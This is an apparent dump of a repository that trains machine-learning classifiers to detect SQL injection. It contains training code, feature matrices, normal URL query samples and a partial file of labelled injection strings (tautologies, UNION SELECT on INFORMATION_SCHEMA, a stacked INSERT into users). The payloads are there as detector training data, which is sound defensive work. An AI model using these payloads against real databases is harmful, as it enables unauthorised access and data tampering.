├── ML_for_SQL ├── .idea │ ├── ML_for_SQL.iml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── misc.xml │ ├── modules.xml │ └── workspace.xml ├── README ├── __pycache__ │ └── featurepossess.cpython-36.pyc ├── adaboost.py ├── data │ ├── all_matrix.csv │ ├── all_matrix.txt │ ├── alltest_matrix.csv │ ├── nor_matrix.csv │ ├── normal_less.csv │ ├── normal_test.csv │ ├── nortest_matrix.csv │ ├── sql_matrix.csv │ ├── sql_test.csv │ ├── sqlnew.csv │ └── sqltest_matrix.csv ├── featurepossess.py ├── file │ ├── Adaboost.model │ ├── GBDT.model │ ├── bys.model │ ├── forestrandom.model │ ├── knn.model │ ├── lg.model │ ├── svm.model │ └── tree.model ├── sqlbys.py ├── sqlforestrandom.py ├── sqlkNN.py ├── sqllogistic.py ├── sqlsvm.py ├── sqltree.py └── testsql.py └── README.md /ML_for_SQL/.idea/ML_for_SQL.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 12 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 
47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 136 | 137 | 138 | 151 | 152 | 153 | 154 | 155 | true 156 | DEFINITION_ORDER 157 | 158 | 159 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 188 | 189 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 214 | 215 | 216 | 217 | 235 | 236 | 254 | 255 | 273 | 274 | 292 | 293 | 311 | 312 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 361 | 362 | 375 | 376 | 394 | 395 | 407 | 408 | project 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 443 | 444 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 480 | 481 | 482 | 483 | 1523458935612 484 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 518 | 519 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 
| 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 732 | 733 | 734 | 735 | 736 | 737 | 738 | 739 | 740 | 741 | 742 | 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 | 771 | 772 | 773 | 774 | 775 | 776 | 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | -------------------------------------------------------------------------------- /ML_for_SQL/README: -------------------------------------------------------------------------------- 1 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 2 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 3 | data是收集的样本数据 4 | file中存放的是训练好的各个模型 5 | featurepossess.py是对原始样本进行预处理,提特征。 6 | sqlsvm.py等py文件是训练模型 7 | testsql是对训练好的模型进行测试,用准确率来度量模型效果。 8 | -------------------------------------------------------------------------------- /ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc 
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 20 19:06:57 2017

@author: wf

Train a gradient-boosting classifier and an AdaBoost classifier on the
feature matrices produced by ``featurepossess.generate`` and report
precision, recall and the confusion matrix on a held-out split.
"""
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.model_selection import train_test_split
from featurepossess import generate
try:
    # scikit-learn >= 0.23 no longer ships ``sklearn.externals.joblib``.
    import joblib
except ImportError:
    # Older scikit-learn releases bundle their own copy of joblib.
    from sklearn.externals import joblib

# Build the per-class feature matrices: label 1 = SQL injection, 0 = normal.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The matrices written by generate() have no header row, so they must be read
# with header=None; with the default, the first sample of each file is
# swallowed as column names and never reaches the training set.
sql_df = pd.read_csv(sql_matrix, header=None)
nor_df = pd.read_csv(nor_matrix, header=None)
feature_max = pd.concat([sql_df, nor_df], ignore_index=True)

# Keep writing the combined matrix to disk as before.
# NOTE(review): the file is now header-less like its inputs; any other script
# that reads it with the pandas default header should pass header=None too.
feature_max.to_csv("./data/all_matrix.csv", encoding="utf_8_sig",
                   index=False, header=False)

arr = feature_max.values
data = np.delete(arr, -1, axis=1)  # features: every column except the last
target = arr[:, -1]                # label: the last column

# Random train/test split (fixed seed for reproducibility).
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)

# Models. AdaBoost clones its base estimator and fits the clones itself, so
# the decision tree does not need to be fitted separately.
model1 = DecisionTreeClassifier(max_depth=5)
model2 = GradientBoostingClassifier(n_estimators=100)
model3 = AdaBoostClassifier(model1, n_estimators=100)
model2.fit(train_data, train_target)
model3.fit(train_data, train_target)

joblib.dump(model2, './file/GBDT.model')  # gradient-boosted decision trees
print("GBDT.model has been saved to 'file/GBDT.model'")

joblib.dump(model3, './file/Adaboost.model')
print("Adaboost.model has been saved to 'file/Adaboost.model'")


def _report(name, model):
    """Print predictions, precision, recall and confusion matrix for *model*."""
    y_pred = model.predict(test_data)
    print("y_pred:%s" % y_pred)
    print("test_target:%s" % test_target)
    # Verify
    print(name)
    print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))
    print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))
    print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))


_report("GBDT:", model2)

_report("Adaboost:", model3)
48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000 14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000 15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000 16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000 17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000 18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000 19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000 20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000 21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000 22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000 23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000 24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000 25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000 26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000 27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000 28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000 29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000 30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000 31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000 32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000 33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000 34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000 35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000 37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000 38 | 
58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000 40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000 41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000 42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000 43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000 44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000 45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000 46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000 47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000 48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000 49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000 50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000 51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000 52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 54 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000 55 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000 56 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000 57 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000 58 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000 59 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000 60 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000 61 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000 62 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000 63 | 
35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000 64 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000 65 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000 66 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000 67 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000 68 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000 69 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000 70 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000 71 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000 72 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000 73 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000 74 | -------------------------------------------------------------------------------- /ML_for_SQL/data/alltest_matrix.csv: -------------------------------------------------------------------------------- 1 | 56.000000,0.000000,0.000000.1,0.089286,0.160714,0.035714,0.000000.2,1.000000 2 | 31.0,0.0,0.0,0.032257999999999995,0.12903199999999998,0.0,0.0,1.0 3 | 30.0,0.0,0.0,0.06666699999999999,0.13333299999999998,0.033333,0.0,1.0 4 | 75.0,0.0,0.0,0.026667000000000003,0.093333,0.013333000000000001,0.0,1.0 5 | 61.0,0.0,0.0,0.06557400000000001,0.147541,0.0,0.0,1.0 6 | 112.0,0.0,0.508929,0.008929000000000001,0.07142899999999999,0.008929000000000001,0.0,1.0 7 | 28.0,0.0,0.0,0.0,0.035713999999999996,0.035713999999999996,0.0,1.0 8 | 64.0,0.0,0.015625,0.03125,0.125,0.015625,0.0,1.0 9 | 62.0,0.0,0.0,0.112903,0.032257999999999995,0.0,0.0,1.0 10 | 29.0,0.0,0.0,0.0,0.172414,0.0,0.034483,1.0 11 | 43.0,0.0,0.0,0.023256,0.09302300000000001,0.023256,0.0,1.0 12 | 107.0,0.0,0.0,0.018692,0.130841,0.037383,0.0,1.0 13 | 48.0,0.0,0.0,0.083333,0.145833,0.020833,0.0,1.0 14 | 109.0,0.0,0.165138,0.045872,0.10091699999999999,0.027523000000000002,0.0,1.0 
15 | 22.0,0.0,0.090909,0.090909,0.0,0.0,0.0,1.0 16 | 142.0,0.0,0.197183,0.119718,0.06337999999999999,0.028169,0.0,1.0 17 | 26.0,0.0,0.153846,0.0,0.0,0.0,0.0,1.0 18 | 124.0,0.0,0.225806,0.120968,0.048387,0.032257999999999995,0.0,1.0 19 | 52.0,0.0,0.307692,0.038462,0.038462,0.019231,0.0,1.0 20 | 52.0,0.0,0.0,0.0,0.076923,0.0,0.0,1.0 21 | 39.0,0.0,0.0,0.05128200000000001,0.153846,0.0,0.0,1.0 22 | 68.0,0.0,0.014706,0.029412,0.147059,0.0,0.0,1.0 23 | 49.0,0.0,0.0,0.081633,0.10204099999999999,0.0,0.0,1.0 24 | 55.0,0.0,0.0,0.0,0.072727,0.0,0.0,1.0 25 | 40.0,0.0,0.0,0.075,0.15,0.0,0.0,1.0 26 | 109.0,0.0,0.027523000000000002,0.055046000000000005,0.15596300000000002,0.018349,0.0,1.0 27 | 93.0,0.0,0.11828,0.032257999999999995,0.075269,0.010753,0.0,1.0 28 | 52.0,0.0,0.173077,0.019231,0.076923,0.019231,0.0,1.0 29 | 55.0,0.0,0.163636,0.036364,0.10909100000000001,0.018182,0.0,1.0 30 | 45.0,0.0,0.0,0.0,0.088889,0.0,0.0,1.0 31 | 50.0,0.0,0.08,0.0,0.1,0.0,0.0,1.0 32 | 115.0,0.0,0.034783,0.0,0.12173900000000001,0.0,0.0,1.0 33 | 40.0,0.0,0.0,0.0,0.2,0.0,0.0,1.0 34 | 27.0,0.0,0.0,0.148148,0.074074,0.0,0.0,1.0 35 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0 36 | 64.0,0.0,0.0,0.015625,0.109375,0.0,0.0,1.0 37 | 54.0,0.0,0.0,0.0,0.12963,0.018519,0.0,1.0 38 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0 39 | 81.0,0.0,0.0,0.012346,0.08642000000000001,0.0,0.0,1.0 40 | 51.0,0.0,0.078431,0.0,0.117647,0.019608,0.0,1.0 41 | 48.0,0.0,0.0,0.0,0.083333,0.0,0.0,1.0 42 | 52.0,0.0,0.076923,0.0,0.11538499999999999,0.0,0.0,1.0 43 | 43.0,0.0,0.0,0.069767,0.09302300000000001,0.0,0.0,1.0 44 | 108.0,0.0,0.037037,0.083333,0.12963,0.0,0.0,1.0 45 | 284.0,0.0,0.028169,0.042254,0.137324,0.0,0.0,1.0 46 | 9.0,0.0,0.0,0.333333,0.0,0.11111099999999999,0.0,1.0 47 | 27.0,0.0,0.074074,0.22222199999999998,0.0,0.0,0.0,1.0 48 | 14.0,0.0,0.0,0.14285699999999998,0.14285699999999998,0.07142899999999999,0.0,1.0 49 | 6.0,0.0,0.333333,0.333333,0.166667,0.166667,0.0,1.0 50 | 17.0,0.0,0.470588,0.235294,0.17647100000000002,0.117647,0.0,1.0 51 
| 12.0,0.0,0.583333,0.083333,0.166667,0.0,0.0,1.0 52 | 83.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0 53 | 0.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0 54 | 81.0,0.0,0.061728,0.493827,0.0,0.0,0.08642000000000001,0.0 55 | 38.0,0.0,0.052632000000000005,0.605263,0.0,0.0,0.078947,0.0 56 | 495.0,0.0,0.367677,0.20202,0.0,0.0,0.018182,0.0 57 | 18.0,0.0,0.055555999999999994,0.833333,0.0,0.0,0.055555999999999994,0.0 58 | 12.0,0.0,0.083333,0.75,0.0,0.0,0.083333,0.0 59 | 22.0,0.0,0.318182,0.590909,0.0,0.0,0.090909,0.0 60 | 318.0,0.0,0.075472,0.41509399999999996,0.0,0.0,0.10691800000000001,0.0 61 | 108.0,0.0,0.083333,0.583333,0.0,0.0,0.083333,0.0 62 | 35.0,0.0,0.05714299999999999,0.657143,0.0,0.0,0.085714,0.0 63 | 48.0,0.0,0.083333,0.375,0.0,0.0,0.083333,0.0 64 | 94.0,0.0,0.265957,0.56383,0.0,0.0,0.10638299999999999,0.0 65 | 39.0,0.0,0.025641000000000004,0.230769,0.0,0.0,0.025641000000000004,0.0 66 | 33.0,0.0,0.151515,0.515152,0.0,0.0,0.090909,0.0 67 | 591.0,0.0,0.115059,0.407783,0.0,0.0033840000000000003,0.101523,0.0 68 | 273.0,0.0,0.07326,0.479853,0.0,0.0,0.12820499999999999,0.0 69 | 964.0,0.0,0.060166,0.40975100000000003,0.0,0.0,0.099585,0.0 70 | 358.0,0.0,0.083799,0.550279,0.002793,0.0,0.106145,0.0 71 | 524.0,0.0,0.188931,0.35686999999999997,0.0,0.0,0.177481,0.0 72 | 119.0,0.0,0.294118,0.218487,0.0,0.0,0.159664,0.0 73 | -------------------------------------------------------------------------------- /ML_for_SQL/data/normal_test.csv: -------------------------------------------------------------------------------- 1 | _%3D1498591621808 2 | code%3Dzs_000001%2Czs_399001%2Czs_399006%26cb%3Dfortune_hq_cn%26_%3D1498591852632 3 | _%3D1498591951848%26list%3Dml_sh600030 4 | 
6053%26ri%3Dzb6-00f%7E-04gUry-01h-0RC%26tn%3D1%26en%3D4L9RATiSWJ84cSXYcX1d2pqRNDaJDyf4dP2hUCLUFiZhTaWU7eK5dl5slq5E7SVvDi63oAKGfcJUNiy27jClo3XeVPICvXbMtyQIUjoFYYlnKQp0XlF0M2zO7d7ub-vumAdasuEscaZLfT5w2tfIKsHlHIn49b0u1Af1JUmZeCeIVpuTgEmDmxYz9GkgA-CCk-qVMZ-V2AfzTEe7HCLcljdw1NcVt-H26P2-dz8IEEj3n9DdQGwpErgkGR6SSbaJpPQu0IgaWmPZEZu-umlvd0urhn88rdu9-Dmn4hYWD2T-menxBL9BSplyy74mnP_4DZXvZ4Ggf4n-k6WXtWPDQYekUxo6XItLiBIOTt5znJ4l9AfspnGY604PtLC0WKwyjqwq27Z4zR9JZsSXxngF9UJFi9JrCW_yldU07E3r3q9LuHrEoy8%3E%3E 5 | b1498592370545%3D1 6 | v%3D13111002 7 | COLLCC%3D3442798258%26 8 | t%3Dcheck%26rec%3Dstratus%26etyp%3Dconnect%26zone%3Dzibo5_cnc%26url%3D119.188.143.32%26errCnt%3D327%26uid%3Dd0a47beafc75e1549c7fdc23530fd959%26uif%3DCNC%7CBeiJing-114.251.186.13%26tvid%3D7706069409%26defi%3D2%26dlod%3D1%26darea%3D1%26ppapi%3Dfalse%26trkip%3D119.188.143.32%26trkon%3D0%26ver%3D3.1.0.15%26dur%3D36431783 9 | cn_600022%2Ccn_600516%2Ccn_000002%2Ccn_600519%2Ccn_000651%2Ccn_600887%2Ccn_002415%2Ccn_601288%2Ccn_000333%2C 10 | _%3D1498179095094%26list%3Dsh600030 11 | q%3DmarketStat%2Cstdunixtime%26_%3D1498584939540 12 | _%3D1498584888937/%26list%3DFU1804%2CFU0%2CFU1707%2CFU1708%2CFU1709%2CFU1710%2CFU1711%2CFU1712 13 | callback%3D_ntes_quote_callback54388229 14 | _%3D1498552987540%26list%3Dhf_OIL 15 | prod%3D56%26systype%3D0%26cid%3D4%26log%3Dact%26from%3D3%263th%3D0%26adTime%3D0%26adType%3Dswf%26dmpt%3Dpad%26po%3Db%26adUrl%3Dhttp%3A//images.sohu.com/ytv/BJ/BJSC/400300201512181625132.swf%26type%3D1%26du%3D500%26al%3D-4%26out%3D0%26au%3D1%26vid%3D130369828%26qd%3Dabbdd136abdb8172%26rt%3D5fd0898fd5ebcf4096145bd7eb4f0bd5%26uv%3D14985797034557443254%26uuid%3D39f371e0-c882-9cdd-fdd7-ea98faf2f9e3%26vt%3D56flash%26rd%3Dwww.56.com%26isIf%3D0%26suv%3D1706280006344804%26uid%3D14985797034557443254%26scookie%3D2%26bad%3D3%26sign%3DTA3ccJAWUeypt831iciWkCbZaSRfhUcmDUDcQDBQDj_tpUXIMgFg-X4ku%3E%3E 16 | 
tu%3Du1889066%26op%3D1%26jk%3Da014e4716ffd54c4%26word%3Dhttp%3A//www.39yst.com/tieshi/yinshi/481666_2.shtml%26if%3D0%26aw%3D670%26ah%3D90%26pt%3D20500%26it%3D0%26vt%3D0%26csp%3D1024%2C738%26bcl%3D1007%2C624%26pof%3D1007%2C4516%26top%3D3776%26left%3D14%26rdm%3D1498585089587 17 | flag%3Dplyract%26plyract%3Dtiming%26prgr%3D75%26lostfrm%3D13%26lostfrmsec%3D1%26tl%3D60%26src%3D%26purl%3Dhttp%3A//www.iqiyi.com/v_19rr7sryv0.html%23curid%3D710171500_9128e16fccd25dd00ca053a1da504df3%26rfr%3Dhttp%3A//www.iqiyi.com/a_19rrhalt31.html%26lrfr%3Dhttps%3A//www.2345.com/%3Fkbox73713266%26aid%3D203965201%26tvid%3D710171500%26vid%3D284da491e1954fe385336e0054af677f%26cid%3D10%26lev%3D96%26puid%3D%26pru%3D%26veid%3D0f37150b10b8d342bb591c2611b35b41%26weid%3D32c87fb9fc3345fec7cace29952f950d%26newusr%3D0%26pla%3D11%26visits%3D%26sttntp%3D0%26plyrtp%3D0%26plyrver%3D3.3.12.22%26z%3Dqingdao4_cmnet%26suid%3D3911317fef78e8c179aef11a83c22c15%26diaoduuip%3DCMNET%7CBeiJing-218.205.147.2%26plid%3D%26vvfrom%3D%26vfrm%3D10-2-0-1%26vfm%3D%26restp%3D2%26ispur%3D0%26as%3D0ffa7999c6c7c070df03efccc58a6ec3%26qdv%3D2%26bstp%3D6%26isdm%3D0%26isstar%3D0%26hu%3D%26mod%3Dcn_s%26videotp%3D0%26stime%3D1498585048072%26server_ip%3D120.221.22.137%26tn%3D0.021188411861658096 18 | s%3D1498585170292%26y%3Dqc_100001_100015%26e%3D1c37a278a281ec7359f4b0a8e75afe92%26g%3D0%26rd%3D2052%26ps%3D0%26h%3D0%26rc%3D1%26c%3D10%26b%3D203965201%26d%3D71%26a%3D16b34fd092c694bc28eebd634829bc83%26l%3DMTA2LjM3LjIwNC4y%26p%3Ds%26av%3DAdManager%204.0.9%26rid%3Df15a9d21816f582f28fa242f983226dd%26vv%3D5.3.2.67%26t%3Ds%26u%3D3911317fef78e8c179aef11a83c22c15 19 | 
t%3D1498533566250%26rst%3Dswf%2Cimg%26ct%3Dd%26cs%3D2074%26td%3D%26s%3D310736%26v%3D710297211%26u%3D1154411548%26k%3D%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%7C%26paid%3D1%26tt%3D%E5%A4%A7%E5%86%9B%E5%B8%88%E5%8F%B8%E9%A9%AC%E6%87%BF%E4%B9%8B%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%2B10%26pu%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTE4ODg0NA%3D%3D.html%3Ffrom%3Dy1.2-2.2%26ref%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTExNDMwNA%3D%3D.html%3Fspm%3Da2h0j.8191423.item_XMjg0MTExNDMwNA%3D%3D.A%26sid%3D1bjjov5pb2l1k%26p%3D323%26_%3D%3E%3E 20 | type%3DgetUserSetCarIcon%26carId%3D460018499102909%26direction%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%26carIconType%3D0 21 | -------------------------------------------------------------------------------- /ML_for_SQL/data/nortest_matrix.csv: -------------------------------------------------------------------------------- 1 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000 2 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000 3 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000 4 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000 5 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000 6 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000 7 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000 8 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000 9 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000 10 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000 11 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000 12 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000 13 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000 14 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000 15 | 
591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000 16 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000 17 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000 18 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000 19 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000 20 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000 21 | -------------------------------------------------------------------------------- /ML_for_SQL/data/sql_test.csv: -------------------------------------------------------------------------------- 1 | ; and 1=1 and 1=22.admin adminuser user pass password .. 2 | and 0<>(select count(*) from *) 3 | group by users.id having 1=1-- 4 | group by users.id, users.username, users.password, users.privs having 1=1-- 5 | ; insert into users values( 666, attacker, foobar, 0xffff )-- 6 | UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable- 7 | and user_blank>_name()=dbo-- 8 | and 0<>(select top 